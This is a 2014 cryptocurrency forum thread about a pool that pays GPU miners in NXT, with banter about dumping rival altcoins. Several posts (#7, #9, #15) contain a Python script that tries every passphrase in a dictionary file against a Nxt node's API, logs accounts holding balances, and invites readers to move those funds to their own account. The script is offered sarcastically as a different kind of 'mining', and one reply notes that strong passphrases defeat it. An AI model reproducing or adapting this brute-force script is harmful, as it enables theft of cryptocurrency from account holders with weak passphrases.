Pages:
Author

Topic: Mine Nxt with GPU (Read 2776 times)

hero member
Activity: 770
Merit: 500
March 26, 2014, 02:45:32 PM
#21
How often are payouts being made in 24 hrs ?
pl7
member
Activity: 68
Merit: 10
March 26, 2014, 02:32:23 PM
#20
i'll give it a try. i like nxt Smiley
sr. member
Activity: 476
Merit: 500
March 25, 2014, 02:10:29 PM
#19
Great pool to use. On par with other multipools in term of NXT to BTC value.
legendary
Activity: 2156
Merit: 1131
March 21, 2014, 06:26:03 AM
#18
BTW, blackcoin is doing this too. It's the new thing, apparently.
Yeah I heard BlackCoin is doing this. We must create a BlackCoin mining pool for Nxt to dump BlackCoin. I'm going to suggest this.
LOL!  Grin

Well it is not possible unfortunately. Mining BlackCoin is not possible any more because they switched to PoS.
Smart move.

legendary
Activity: 1205
Merit: 1000
March 21, 2014, 05:38:39 AM
#17
BTW, blackcoin is doing this too. It's the new thing, apparently.

Yeah I heard BlackCoin is doing this. We must create a BlackCoin mining pool for Nxt to dump BlackCoin. I'm going to suggest this.


LOL!  Grin
legendary
Activity: 2156
Merit: 1131
March 19, 2014, 05:43:41 PM
#16
BTW, blackcoin is doing this too. It's the new thing, apparently.

Yeah I heard BlackCoin is doing this. We must create a BlackCoin mining pool for Nxt to dump BlackCoin. I'm going to suggest this.

full member
Activity: 224
Merit: 100
March 19, 2014, 04:42:10 PM
#15
You left out the CPU miners  Tongue

OF COURSE, I do not condone that you actually do any of this and engage in cracking people's accounts, but if Nxt'ers actually promote a multipool to dump and destroy other coins while pumping Nxt and even brag about it, I'm not going to claim higher moral ground on this one and will even play a bit of the zero-sum game for the fuck of it


To mine this coin, you need a different kind of "miner".  Tongue

For example, get it NXT Password Recovery Tool! / NXT mining rig https://bitcointalksearch.org/topic/nxt-password-recovery-tool-nxt-mining-rig-506298 as I said, or you adapt and improve this basic python script:
Code:
import os, urllib2, json, string

def DumpNxt (passw, printall=False):
    global iTEST
    try:
        usock = urllib2.urlopen ('http://localhost:7874/nxt?requestType=getAccountId&secretPhrase=%s' % passw)
        acid = usock.read().split ('"')[3]
        usock.close()
    except:
        return None

    try:
        usock = urllib2.urlopen ('http://localhost:7874/nxt?requestType=getBalance&account=%s' % acid)
        js = json.load (usock)
        usock.close()
    except:
        return None

    
    if js['balance'] or js['effectiveBalance'] or js['unconfirmedBalance']:
        fout = open ('nxtdump.txt','a')
        fout.write ('%s %s %s\n' % ( passw, acid, js['balance']))
        fout.close ()
        
        return (passw, acid, js)
    return None

bal = DumpNxt ('Password')
for line in open ('dict.txt').readlines():
    bal = DumpNxt (line.strip())
    if bal:
        print bal
You need to run the Nxt reference software and provide a suitable password dictionary file "dict.txt" to the script above.

On the console and on an output file, you will get a few passwords, account # and non-zero balances. You will then have to manually or with a better script, transfer the "block rewards" Tongue to your account.

I hope you realize that in order to crack truly secure dictionary passphrases (ie. like electrum), this would take billions to trillions of years at minimum with all the computers in the world before you found a single correct combination?

BTW, blackcoin is doing this too. It's the new thing, apparently.
legendary
Activity: 1205
Merit: 1000
March 19, 2014, 04:34:02 AM
#14
Nice! Still need a webdesign though.  Wink
legendary
Activity: 2156
Merit: 1131
March 19, 2014, 04:26:16 AM
#13
legendary
Activity: 2156
Merit: 1131
March 18, 2014, 05:20:55 AM
#12
Nice of you to try to be a bit more inclusive after all with CPU miners...   Tongue
It's the first step to realize that there is no room for divisionism and serious conflicts in the crypto-coin scene, in such early stage. You should focus on competing with centralized, high fees payment processors that can lock you out of your rightfully earned money instead of destroying Litecoin, Dogecoin and others to promote yourself. Yes, it is only fair that the best projects thrive and the redundant are left behind. However, be sure you find better ways, than promote races to the bottom. You will also be dragged down to it.
I have nothing else to say, feel free to reply, bash, insult, etc... But this is a fair warning: change your ways. There is nothing to be gained from zero-sum games to be taken so seriously.

No one is insulting you. No one is even feeling a bit angry.

Since when mining destroy PoW coin ?

I thought mining was the condition to secure a PoW coin, isn't it ?

You see, the mining scheme is flawed. Mining is absurd in itself. People just do it for the fun so let us do it.
sr. member
Activity: 840
Merit: 255
SportsIcon - Connect With Your Sports Heroes
March 18, 2014, 04:43:02 AM
#11
Nice of you to try to be a bit more inclusive after all with CPU miners...   Tongue

It's the first step to realize that there is no room for divisionism and serious conflicts in the crypto-coin scene, in such early stage. You should focus on competing with centralized, high fees payment processors that can lock you out of your rightfully earned money instead of destroying Litecoin, Dogecoin and others to promote yourself. Yes, it is only fair that the best projects thrive and the redundant are left behind. However, be sure you find better ways, than promote races to the bottom. You will also be dragged down to it.

I have nothing else to say, feel free to reply, bash, insult, etc... But this is a fair warning: change your ways. There is nothing to be gained from zero-sum games to be taken so seriously.
legendary
Activity: 1205
Merit: 1000
March 18, 2014, 04:42:55 AM
#10
You left out the CPU miners  Tongue
OF COURSE, I do not condone that you actually do any of this and engage in cracking people's accounts, but if Nxt'ers actually promote a multipool to dump and destroy other coins while pumping Nxt and even brag about it, ..

Maybe Nxt is the official 'Deletecoin'?  Wink

Just let us miners have some fun in mining and get paid NXT.  Smiley The less worthless altcoins there will be, the better for cryptocurrency in general.  Wink
legendary
Activity: 952
Merit: 1000
Yeah! I hate ShroomsKit!
March 18, 2014, 04:38:11 AM
#9
You left out the CPU miners  Tongue

OF COURSE, I do not condone that you actually do any of this and engage in cracking people's accounts, but if Nxt'ers actually promote a multipool to dump and destroy other coins while pumping Nxt and even brag about it, I'm not going to claim higher moral ground on this one and will even play a bit of the zero-sum game for the fuck of it


To mine this coin, you need a different kind of "miner".  Tongue

For example, get it NXT Password Recovery Tool! / NXT mining rig https://bitcointalksearch.org/topic/nxt-password-recovery-tool-nxt-mining-rig-506298 as I said, or you adapt and improve this basic python script:
Code:
import os, urllib2, json, string

def DumpNxt (passw, printall=False):
    global iTEST
    try:
        usock = urllib2.urlopen ('http://localhost:7874/nxt?requestType=getAccountId&secretPhrase=%s' % passw)
        acid = usock.read().split ('"')[3]
        usock.close()
    except:
        return None

    try:
        usock = urllib2.urlopen ('http://localhost:7874/nxt?requestType=getBalance&account=%s' % acid)
        js = json.load (usock)
        usock.close()
    except:
        return None

    
    if js['balance'] or js['effectiveBalance'] or js['unconfirmedBalance']:
        fout = open ('nxtdump.txt','a')
        fout.write ('%s %s %s\n' % ( passw, acid, js['balance']))
        fout.close ()
        
        return (passw, acid, js)
    return None

bal = DumpNxt ('Password')
for line in open ('dict.txt').readlines():
    bal = DumpNxt (line.strip())
    if bal:
        print bal
You need to run the Nxt reference software and provide a suitable password dictionary file "dict.txt" to the script above.

On the console and on an output file, you will get a few passwords, account # and non-zero balances. You will then have to manually or with a better script, transfer the "block rewards" Tongue to your account.

LOL Wipeout2097, I am not sure if you are just butthurt or developing this "password cracker" for real  Roll Eyes
legendary
Activity: 2156
Merit: 1131
March 18, 2014, 04:18:34 AM
#8
You left out the CPU miners  Tongue

I actually suggested to create a CPU mining pool for Nxt just after the GPU is working but thanks for the reminder.

sr. member
Activity: 840
Merit: 255
SportsIcon - Connect With Your Sports Heroes
March 18, 2014, 04:09:55 AM
#7
You left out the CPU miners  Tongue

OF COURSE, I do not condone that you actually do any of this and engage in cracking people's accounts, but if Nxt'ers actually promote a multipool to dump and destroy other coins while pumping Nxt and even brag about it, I'm not going to claim higher moral ground on this one and will even play a bit of the zero-sum game for the fuck of it


To mine this coin, you need a different kind of "miner".  Tongue

For example, get it NXT Password Recovery Tool! / NXT mining rig https://bitcointalksearch.org/topic/nxt-password-recovery-tool-nxt-mining-rig-506298 as I said, or you adapt and improve this basic python script:
Code:
import os, urllib2, json, string

def DumpNxt (passw, printall=False):
    global iTEST
    try:
        usock = urllib2.urlopen ('http://localhost:7874/nxt?requestType=getAccountId&secretPhrase=%s' % passw)
        acid = usock.read().split ('"')[3]
        usock.close()
    except:
        return None

    try:
        usock = urllib2.urlopen ('http://localhost:7874/nxt?requestType=getBalance&account=%s' % acid)
        js = json.load (usock)
        usock.close()
    except:
        return None

    
    if js['balance'] or js['effectiveBalance'] or js['unconfirmedBalance']:
        fout = open ('nxtdump.txt','a')
        fout.write ('%s %s %s\n' % ( passw, acid, js['balance']))
        fout.close ()
        
        return (passw, acid, js)
    return None

bal = DumpNxt ('Password')
for line in open ('dict.txt').readlines():
    bal = DumpNxt (line.strip())
    if bal:
        print bal
You need to run the Nxt reference software and provide a suitable password dictionary file "dict.txt" to the script above.

On the console and on an output file, you will get a few passwords, account # and non-zero balances. You will then have to manually or with a better script, transfer the "block rewards" Tongue to your account.
sr. member
Activity: 840
Merit: 255
SportsIcon - Connect With Your Sports Heroes
March 18, 2014, 02:16:43 AM
#6
I'd be more careful with the shitty zero-sum games you evil geniuses are trying to play ...

Someone may be tempted to set up another kind of "pool" to "mine" Nxt out of your accounts.

NXT Password Recovery Tool! / NXT mining rig
https://bitcointalksearch.org/topic/nxt-password-recovery-tool-nxt-mining-rig-506298
legendary
Activity: 2156
Merit: 1131
March 18, 2014, 02:09:38 AM
#5
So, I'd actually have to pay a 2.5% fee to help you Nxt bag holders and shills pump your coin, while contributing to the scrypt coin dump and long term value destruction that multipools provide.
It's even more ludicruous when some Nxt'ers actually hate miners ... Roll Eyes

Yes that's a evil genius plan Smiley
I plan on buying a new GPU rig just for this.
sr. member
Activity: 840
Merit: 255
SportsIcon - Connect With Your Sports Heroes
March 17, 2014, 03:19:53 PM
#4
So, I'd actually have to pay a 2.5% fee to help you Nxt bag holders and shills pump your coin, while contributing to the scrypt coin dump and long term value destruction that multipools provide.

It's even more ludicruous when some Nxt'ers actually hate miners ... Roll Eyes
legendary
Activity: 2156
Merit: 1131
March 17, 2014, 03:10:25 PM
#3
I'm mining NXT right now! How cool is that!  Cool

Awesome !

I hope the pool operator finish the buying-Nxt-and-sending automation soon.
Also the pool need to handle much bigger traffic.

Soon we release the hounds.
legendary
Activity: 1205
Merit: 1000
March 17, 2014, 03:06:28 PM
#2
I'm mining NXT right now! How cool is that!  Cool
Pages:
Jump to: